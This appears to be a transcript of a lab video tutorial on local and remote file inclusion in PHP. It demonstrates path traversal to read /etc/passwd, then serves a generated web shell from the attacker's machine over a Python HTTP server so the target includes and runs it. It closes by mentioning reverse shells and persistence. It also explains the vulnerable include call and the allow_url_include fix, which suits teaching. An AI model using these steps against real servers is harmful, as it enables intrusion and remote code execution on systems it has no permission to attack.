In this video, we're going to be going over LFI, otherwise known as local file inclusion. So for this, we just need 4 of the VMs running, which is the domain controller, the pfSense router, the Ubuntu server, and the Kali machine. We need to head over to the Ubuntu machine. So we're quickly going to grab a script that Dale has made for us. So this is on the demsec website. So if we do a wget www.demsec.co.uk/downloads /gtp /file inclusion .zip, and once that is downloaded, we can unzip the file. So if we do unzip and then file inclusion.zip, and then we just need to install the install.sh. So if we do bash install.sh, so now that's installed, what we can do is we can head over to our Kali machine. We can go on to Firefox and we can navigate to the Ubuntu IP. So if we do 192.168.2.103, and we need to go to /5. So we are presented with this screen, which we can download kittens.txt. So let's go ahead and download it. So it says nothing interesting here, but we can see up here that it says download equals kittens.txt. So why don't we try index.php? Okay, so we get loads of these, which isn't really useful, but at least we know it does something. So let's try // and then if we copy that a couple of times, and then if we do etc/passwd, we're then presented with the password file. So the best way of explaining this is to show you the PHP file. So if we head over to the Ubuntu machine, so if we do nano var www.html and then 5 and then index.php. So in this first bit of PHP, you can see that it uses the get parameter and puts it directly into the include statement. So this is the reason why we get the password file. Sometimes people misconfigure this and they will allow you to do this with remote files. So why don't we try it? So if we use something called GitHub, we can actually perform this. So if we do git clone and then that URL, which will be in the description, and then if we cd into that folder, and then we need to do php index.php. So this will show us what the options that we can use. So if we do php index.php and then do an output file, so if we do -o and then do shell.txt, and then if we give it a password of password and press enter. So essentially this has created a payload for us. If we start a simple HTTP server with Python, so if we do Python -m simple HTTP server and a port of 8099. So if we head over to the browser, we can do http:// and then the IP address of the Kali machine, which is 192.168.2.106 : and then the port that we assigned, which is 8099 / and then shells.txt, and press enter. We can see it doesn't do anything. So this isn't properly configured for what we need. However, I will show you what we need to do in order for this to work. So we just need to do sudo nano etc php and then 5.6, Apache 2, and then php.ini. And if we do a Control W and then search for allow underscore and press enter, we can then go to this allow URL include, and for this purposes we want to turn this to on. So in theory, we should, if we are configuring PHP, we should always ensure that that is off, so that this can't happen, so that we can't include files into whatever it is we want to run. So if we save that, now we want to do a sudo service apache to restart, and then we're presented with this page. So as we know earlier, we set the password as password, so let's put that in. So here you can see that we have access to the server. So if we go to terminal, we should have a shell. So if we do ls, so you can see it carries out the command. So what we could also do is get a reverse interpreter shell, and then we could essentially gain persistence.